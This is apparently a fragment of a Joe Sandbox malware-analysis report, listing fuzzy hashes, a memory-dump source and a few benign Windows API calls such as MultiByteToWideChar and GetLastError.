                                              • Instruction ID: e01706d13d1565dd4abe70dc383fa81fac9562493bca3bb6b0249cc33d6045a9
                                              • Opcode Fuzzy Hash: 9b9e7f5e1b40906d7cfc34f11a4715e5e60031f7a0680760659966f4d1a16e86
                                              • Instruction Fuzzy Hash: 2AD0C93A589111AFE7454BE4AC0CB853A79A706231F108206F82141BF0CB7544E5AA14
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,000C1AD8), ref: 000FFAF4
                                              • GetLastError.KERNEL32 ref: 000FFB02
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000FFB5D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide$ErrorLast
                                              • String ID:
                                              • API String ID: 1717984340-0
                                              • Opcode ID: caad996117b35812e7a38f9e0e5d180d961986ea02ca0c77b65ebf8294b57bb8
                                              • Instruction ID: 7c00edbd55139c995f5c9d0d916f330ca86da34ebe2e4027175e31a4ecd06a19
                                              • Opcode Fuzzy Hash: caad996117b35812e7a38f9e0e5d180d961986ea02ca0c77b65ebf8294b57bb8
                                              • Instruction Fuzzy Hash: 7241023160024BAFCF258F64C854ABEBBF5EF41320F1441B9FA599B6A1DB708C01EB51